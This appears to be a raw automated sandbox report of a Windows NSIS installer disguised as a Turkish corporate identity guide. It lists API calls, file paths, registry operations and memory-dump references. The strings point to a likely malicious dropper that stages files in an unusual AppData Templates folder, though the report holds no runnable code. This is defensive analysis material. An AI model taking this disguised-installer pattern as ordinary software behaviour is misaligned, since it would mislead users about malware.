                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                          • API String ID: 4283519449-3759343206
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00405359,0041DA00,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(0041DA00,Call), ref: 0040647A
                                                                                                                                                                                          • CoTaskMemFree.OLE32(0041DA00), ref: 00406485
                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146,?,?,00000031), ref: 004017D5
                                                                                                                                                                                            • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                            • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp$C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146$Call
                                                                                                                                                                                          • API String ID: 1941528284-2497160516
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                          • String ID: ... %d%%$@
                                                                                                                                                                                          • API String ID: 551687249-3859443358
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                            • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                          • API String ID: 3449924974-3370423016
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9), ref: 00405E18
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                          • API String ID: 1716503409-3204459172
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6F3D1B5F: GlobalFree.KERNEL32(?), ref: 6F3D1DB2
                                                                                                                                                                                            • Part of subcall function 6F3D1B5F: GlobalFree.KERNEL32(?), ref: 6F3D1DB7
                                                                                                                                                                                            • Part of subcall function 6F3D1B5F: GlobalFree.KERNEL32(?), ref: 6F3D1DBC
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1825
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 6F3D18AB
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D18D0
                                                                                                                                                                                            • Part of subcall function 6F3D2352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F3D2383
                                                                                                                                                                                            • Part of subcall function 6F3D2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F3D17F6,00000000), ref: 6F3D27F4
                                                                                                                                                                                            • Part of subcall function 6F3D15C6: wsprintfW.USER32 ref: 6F3D15F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$Enum
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,76FC3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 00405C48
                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                            • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                            • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146, xrefs: 00401640
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146
                                                                                                                                                                                          • API String ID: 1892508949-3016365613
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                            • Part of subcall function 0040427D: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                            • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNEL32(00825A20), ref: 00401BE7
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Enum$CloseValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 397863658-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3356406503-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseDeleteValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2831762973-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                            • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                            • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                            • Part of subcall function 00406624: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000), ref: 6F3D2B6B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                            • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                          Memory Dump Source
